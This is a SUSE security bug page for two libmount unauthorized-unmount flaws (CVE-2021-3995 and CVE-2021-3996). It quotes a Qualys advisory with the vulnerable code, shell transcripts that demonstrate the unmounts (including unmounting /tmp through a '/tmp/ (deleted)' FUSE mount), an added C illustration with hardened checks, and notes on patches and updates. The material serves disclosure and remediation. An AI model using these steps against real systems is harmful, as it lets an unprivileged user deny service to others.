Bug 1194976 - (CVE-2021-3995) VUL-0: CVE-2021-3995, CVE-2021-3996: util-linux: libmount unauthorized unmounts
Status: RESOLVED FIXED
Classification: Novell Products
Product: SUSE Security Incidents
Component: Incidents
Version: unspecified
Hardware: Other  OS: Other
Priority: P3 - Medium  Severity: Normal
Target Milestone: ---
Assigned To: Stanislav Brabec
QA Contact: Security Team bot
URL: https://smash.suse.de/issue/321258/
Whiteboard: CVSSv3.1:SUSE:CVE-2021-3995:4.7:(AV:L...
Depends on:
Blocks:
Reported: 2022-01-20 16:53 UTC by Alexander Bergmann
Modified: 2022-05-16 17:38 UTC (History)
See Also:
Found By: Security Response Team
Services Priority:
Business Priority:
Blocker: ---
Marketing QA Status: ---
IT Deployment: ---

Comment 6 Marcus Meissner 2022-01-24 14:06:26 UTC
is public

From: Qualys Security Advisory <qsa@qualys.com>
Subject: [oss-security] CVE-2021-3996 and CVE-2021-3995 in util-linux's libmount

Hi all,

We discovered two vulnerabilities (unauthorized unmounts) in
util-linux's libmount, CVE-2021-3996 and CVE-2021-3995. Patches are now
available at (many thanks to Karel Zak, Red Hat Product Security, and
the members of linux-distros@openwall):

https://github.com/util-linux/util-linux/commit/166e87368ae88bf31112a30e078cceae637f4cdb
https://github.com/util-linux/util-linux/commit/57202f5713afa2af20ffbb6ab5331481d0396f8d
https://github.com/util-linux/util-linux/commit/9c05f4b6bf62a20a64a8e5735c7f3dcf0229e895

https://github.com/util-linux/util-linux/commits/stable/v2.37
https://mirrors.edge.kernel.org/pub/linux/utils/util-linux/v2.37/

Below is a short write-up (which is part of a longer advisory that is
mostly unrelated to util-linux and that we will publish at a later
date):


========================================================================
CVE-2021-3996 and CVE-2021-3995 in util-linux's libmount
========================================================================

[...]

Consequently, we audited the SUID-root programs umount and fusermount
for ways to unmount a filesystem that does not belong to us, and we
discovered CVE-2021-3996 and CVE-2021-3995 in util-linux's libmount
(which is used internally by umount).

Note: CVE-2021-3996 and CVE-2021-3995 were both introduced by commit
5fea669 ("libmount: Support unmount FUSE mounts") in November 2018.


========================================================================
CVE-2021-3996: Unauthorized unmount in util-linux's libmount
========================================================================

In order for an unprivileged user to unmount a FUSE filesystem with
umount, this filesystem must a/ be listed in /proc/self/mountinfo, and
b/ be a FUSE filesystem (lines 466-470), and c/ belong to the current,
unprivileged user (lines 477-498):

------------------------------------------------------------------------
 451 static int is_fuse_usermount(struct libmnt_context *cxt, int *errsv)
 452 {
 ...
 466         if (strcmp(type, "fuse") != 0 &&
 467             strcmp(type, "fuseblk") != 0 &&
 468             strncmp(type, "fuse.", 5) != 0 &&
 469             strncmp(type, "fuseblk.", 8) != 0)
 470                 return 0;
 ...
 477         if (mnt_optstr_get_option(optstr, "user_id", &user_id, &sz) != 0)
 478                 return 0;
 ...
 490         uid = getuid();
 ...
 497         snprintf(uidstr, sizeof(uidstr), "%lu", (unsigned long) uid);
 498         return strncmp(user_id, uidstr, sz) == 0;
 499 }
------------------------------------------------------------------------

Unfortunately, when parsing /proc/self/mountinfo, the libmount blindly
removes any " (deleted)" suffix from the mountpoint pathnames (at lines
231-233):

------------------------------------------------------------------------
 17 #define PATH_DELETED_SUFFIX     " (deleted)"
------------------------------------------------------------------------
 179 static int mnt_parse_mountinfo_line(struct libmnt_fs *fs, const char *s)
 180 {
 ...
 223         /* (5) target */
 224         fs->target = unmangle(s, &s);
 ...
 231         p = (char *) endswith(fs->target, PATH_DELETED_SUFFIX);
 232         if (p && *p)
 233                 *p = '\0';
------------------------------------------------------------------------

This vulnerability allows an unprivileged user to unmount other users'
filesystems that are either world-writable themselves (like /tmp) or
mounted in a world-writable directory.

For example, on Fedora, /tmp is a tmpfs, so we can mount a basic FUSE
filesystem named "/tmp/ (deleted)" (with FUSE's "hello world" program,
./hello) and unmount /tmp itself (a denial of service):

------------------------------------------------------------------------
$ id
uid=1000(john) gid=1000(john) groups=1000(john) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

$ grep /tmp /proc/self/mountinfo
84 87 0:34 / /tmp rw,nosuid,nodev shared:38 - tmpfs tmpfs rw,seclabel,size=2004304k,nr_inodes=409600,inode64

$ mkdir -m 0700 /tmp/" (deleted)"
$ ./hello /tmp/" (deleted)"

$ grep /tmp /proc/self/mountinfo
84 87 0:34 / /tmp rw,nosuid,nodev shared:38 - tmpfs tmpfs rw,seclabel,size=2004304k,nr_inodes=409600,inode64
620 84 0:46 / /tmp/\040(deleted) rw,nosuid,nodev,relatime shared:348 - fuse.hello hello rw,user_id=1000,group_id=1000

$ mount | grep /tmp
tmpfs on /tmp type tmpfs (rw,nosuid,nodev,seclabel,size=2004304k,nr_inodes=409600,inode64)
/home/john/hello on /tmp/ type fuse.hello (rw,nosuid,nodev,relatime,user_id=1000,group_id=1000)

$ umount -l /tmp/
$ grep /tmp /proc/self/mountinfo | wc
      0       0       0
------------------------------------------------------------------------


========================================================================
CVE-2021-3995: Unauthorized unmount in util-linux's libmount
========================================================================

Alert readers may have spotted another vulnerability in
is_fuse_usermount(): at line 498, only the first "sz" characters of the
current user's uid are compared to the filesystem's "user_id" option (sz
is user_id's length). This second vulnerability allows an unprivileged
user to unmount the FUSE filesystems that belong to certain other users;
for example, if our own uid is 1000, then we can unmount the FUSE
filesystems of the users whose uid is 100, 10, or 1:

------------------------------------------------------------------------
$ id
uid=1000(john) gid=1000(john) groups=1000(john) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

$ grep fuse /proc/self/mountinfo
38 23 0:32 / /sys/fs/fuse/connections rw,nosuid,nodev,noexec,relatime shared:18 - fusectl fusectl rw
620 87 0:46 / /mnt/bin rw,nosuid,nodev,relatime shared:348 - fuse.hello hello rw,user_id=1,group_id=1

$ umount -l /mnt/bin
$ grep fuse /proc/self/mountinfo
38 23 0:32 / /sys/fs/fuse/connections rw,nosuid,nodev,noexec,relatime shared:18 - fusectl fusectl rw
------------------------------------------------------------------------


Thank you very much! We are at your disposal for questions, comments,
and further discussions.

With best regards,

-- 
the Qualys Security Advisory team
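The two checks the advisory above describes, as an added example that is not libmount's own code and not part of the Qualys write-up: a miniature mountinfo parser with the " (deleted)" suffix stripping behind CVE-2021-3996 switchable on and off, and an is_fuse_usermount()-style ownership check in its vulnerable prefix-compare form (CVE-2021-3995) beside a hardened form that parses the whole user_id value. The mountinfo lines are constructed from the advisory's transcripts, and every function and struct name (unmangle, parse_mountinfo_line, lookup_target, fuse_user_id, fuse_usermount_vulnerable, fuse_usermount_hardened, mi_entry) is this example's own, not libmount's API; the hardened form is one reasonable fix, not a claim about what the upstream commits do.

```c
/* Added example, not libmount code: a miniature re-implementation of the checks the advisory
 * describes, run on constructed mountinfo lines. " (deleted)" suffix stripping (CVE-2021-3996)
 * and the prefix-only user_id compare (CVE-2021-3995) beside hardened forms; all names are ours. */
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define PATH_DELETED_SUFFIX " (deleted)"
#define ISOCT(c) ((c) >= '0' && (c) <= '7')
struct mi_entry { char target[256]; char fstype[64]; char superopts[256]; };

/* Decode in place the \040 (space), \011, \012 and \134 escapes the kernel emits. */
static void unmangle(char *s)
{
    char *o = s;
    for (const char *i = s; *i; i++, o++)
        if (i[0] == '\\' && ISOCT(i[1]) && ISOCT(i[2]) && ISOCT(i[3])) {
            *o = (char)(((i[1] - '0') << 6) | ((i[2] - '0') << 3) | (i[3] - '0'));
            i += 3;
        } else
            *o = *i;
    *o = '\0';
}

/* Parse target, fstype and super-options. strip_deleted = 1 reproduces the vulnerable
 * behaviour: a target that merely ends in " (deleted)" is silently truncated. */
static int parse_mountinfo_line(const char *line, int strip_deleted, struct mi_entry *e)
{
    const char *sep = strstr(line, " - ");   /* separator before fstype */
    size_t tl, sl = strlen(PATH_DELETED_SUFFIX);
    if (!sep || sscanf(line, "%*s %*s %*s %*s %255s", e->target) != 1 ||
        sscanf(sep + 3, "%63s %*s %255s", e->fstype, e->superopts) != 2)
        return -1;
    unmangle(e->target); unmangle(e->fstype); unmangle(e->superopts);
    tl = strlen(e->target);
    if (strip_deleted && tl > sl && strcmp(e->target + tl - sl, PATH_DELETED_SUFFIX) == 0)
        e->target[tl - sl] = '\0';
    return 0;
}

/* Index of the first entry whose parsed target equals path (a lookup by mountpoint), or -1. */
static int lookup_target(const char *const *lines, int n, int strip_deleted, const char *path,
                         struct mi_entry *out)
{
    for (int i = 0; i < n; i++)
        if (parse_mountinfo_line(lines[i], strip_deleted, out) == 0 && strcmp(out->target, path) == 0)
            return i;
    return -1;
}

/* user_id super-option (value pointer and length) of a FUSE entry, NULL otherwise. */
static const char *fuse_user_id(const struct mi_entry *e, size_t *vlen)
{
    const char *t = e->fstype;
    if (strcmp(t, "fuse") && strcmp(t, "fuseblk") && strncmp(t, "fuse.", 5) && strncmp(t, "fuseblk.", 8))
        return NULL;
    for (const char *p = e->superopts, *end; *p; p = end + 1) {
        size_t seglen = (end = strchr(p, ',')) ? (size_t)(end - p) : strlen(p);
        if (seglen > 8 && strncmp(p, "user_id=", 8) == 0) {
            *vlen = seglen - 8;
            return p + 8;
        }
        if (!end) break;
    }
    return NULL;
}

/* Vulnerable check (the advisory's line 498): only the first vlen characters of the
 * caller's uid are compared, so uid 1000 "owns" mounts with user_id=1, 10 or 100. */
static int fuse_usermount_vulnerable(const struct mi_entry *e, unsigned long uid)
{
    size_t sz; char uidstr[32];
    const char *user_id = fuse_user_id(e, &sz);
    if (!user_id) return 0;
    snprintf(uidstr, sizeof uidstr, "%lu", uid);
    return strncmp(user_id, uidstr, sz) == 0;
}

/* Hardened check: the whole user_id value must be a plain decimal number equal to uid. */
static int fuse_usermount_hardened(const struct mi_entry *e, unsigned long uid)
{
    size_t sz; char buf[32], *end;
    const char *user_id = fuse_user_id(e, &sz);
    if (!user_id || sz == 0 || sz >= sizeof buf || user_id[0] < '0' || user_id[0] > '9') return 0;
    memcpy(buf, user_id, sz); buf[sz] = '\0';
    errno = 0;
    unsigned long v = strtoul(buf, &end, 10);
    return errno == 0 && *end == '\0' && v == uid;
}

/* Constructed mountinfo lines modelled on the advisory's transcripts. */
static const char MI_TMP[] = "84 87 0:34 / /tmp rw,nosuid,nodev shared:38 - tmpfs tmpfs rw,seclabel";
static const char MI_FUSE_DELETED[] = "620 84 0:46 / /tmp/\\040(deleted) rw,nosuid,nodev,relatime shared:348 - fuse.hello hello rw,user_id=1000,group_id=1000";
static const char MI_FUSE_UID1[] = "620 87 0:46 / /mnt/bin rw,nosuid,nodev,relatime shared:348 - fuse.hello hello rw,user_id=1,group_id=1";
static const char *const TABLE[] = { MI_TMP, MI_FUSE_DELETED };
int main(void)
{
    struct mi_entry e;
    printf("lookup of \"/tmp/\": entry %d with suffix stripping, %d without (-1 = none)\n",
           lookup_target(TABLE, 2, 1, "/tmp/", &e), lookup_target(TABLE, 2, 0, "/tmp/", &e));
    parse_mountinfo_line(MI_FUSE_UID1, 0, &e);
    printf("uid 1000 vs user_id=1: vulnerable=%d hardened=%d\n",
           fuse_usermount_vulnerable(&e, 1000), fuse_usermount_hardened(&e, 1000));
    return 0;
}
```

With stripping enabled, a lookup of "/tmp/" matches the FUSE entry whose real target is "/tmp/ (deleted)", which is exactly the confusion the advisory's `umount -l /tmp/` transcript relies on; with the raw decoded target kept, nothing matches. For the uid check, the strncmp-with-sz form accepts user_id=1 for uid 1000, while parsing the option as a complete decimal number and comparing values rejects it. A defender auditing a setuid helper can apply the same two rules: never normalise a kernel-supplied path before using it as an authorisation key, and never compare identity values by prefix.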
Comment 7 Stanislav Brabec 2022-01-24 21:09:58 UTC
I am taking f3db9bd609494099f0c1b95231c5dfe383346929 and 018a10907fa9885093f6d87401556932c2d8bd2b from the maintenance branch. These two patches cover all three of the patches mentioned below.
Comment 8 Stanislav Brabec 2022-01-24 21:28:21 UTC
Hopefully, only util-linux >= 2.34 is affected, i.e. SLE15 SP3 and SP4.

git describe --contains 5fea669
v2.34-rc1~248

The feature was not backported to 2.33.x.
Comment 9 Stanislav Brabec 2022-01-24 21:49:32 UTC
SLE15 SP3 Update: https://build.suse.de/request/show/263018
SLE15 SP4: https://build.suse.de/request/show/263019

Factory will get 2.37.3 soon.
Comment 11 Swamp Workflow Management 2022-03-04 14:36:07 UTC
openSUSE-SU-2022:0727-1: An update that solves two vulnerabilities, contains two features and has two fixes is now available.

Category: security (moderate)
Bug References: 1188507,1192954,1193632,1194976
CVE References: CVE-2021-3995,CVE-2021-3996
JIRA References: SLE-23384,SLE-23402
Sources used:
openSUSE Leap 15.3 (src):    libeconf-0.4.4+git20220104.962774f-150300.3.6.2, python3-libmount-2.36.2-150300.4.14.2, shadow-4.8.1-150300.4.3.8, util-linux-2.36.2-150300.4.14.3, util-linux-systemd-2.36.2-150300.4.14.2
Comment 12 Swamp Workflow Management 2022-03-04 14:44:37 UTC
SUSE-SU-2022:0727-1: An update that solves two vulnerabilities, contains two features and has two fixes is now available.

Category: security (moderate)
Bug References: 1188507,1192954,1193632,1194976
CVE References: CVE-2021-3995,CVE-2021-3996
JIRA References: SLE-23384,SLE-23402
Sources used:
SUSE Linux Enterprise Module for Transactional Server 15-SP3 (src):    libeconf-0.4.4+git20220104.962774f-150300.3.6.2
SUSE Linux Enterprise Module for Server Applications 15-SP3 (src):    util-linux-systemd-2.36.2-150300.4.14.2
SUSE Linux Enterprise Module for Basesystem 15-SP3 (src):    libeconf-0.4.4+git20220104.962774f-150300.3.6.2, shadow-4.8.1-150300.4.3.8, util-linux-2.36.2-150300.4.14.3, util-linux-systemd-2.36.2-150300.4.14.2
SUSE Linux Enterprise Micro 5.1 (src):    libeconf-0.4.4+git20220104.962774f-150300.3.6.2, shadow-4.8.1-150300.4.3.8, util-linux-2.36.2-150300.4.14.3, util-linux-systemd-2.36.2-150300.4.14.2

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 13 Swamp Workflow Management 2022-04-19 22:31:03 UTC
SUSE-SU-2022:0727-2: An update that solves two vulnerabilities, contains two features and has two fixes is now available.

Category: security (moderate)
Bug References: 1188507,1192954,1193632,1194976
CVE References: CVE-2021-3995,CVE-2021-3996
JIRA References: SLE-23384,SLE-23402
Sources used:
SUSE Linux Enterprise Micro 5.2 (src):    libeconf-0.4.4+git20220104.962774f-150300.3.6.2, shadow-4.8.1-150300.4.3.8, util-linux-2.36.2-150300.4.14.3, util-linux-systemd-2.36.2-150300.4.14.2

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 14 Stanislav Brabec 2022-05-16 17:38:11 UTC
Fixes are released and Factory contains fixed util-linux-2.37.4. I guess we can close this bug.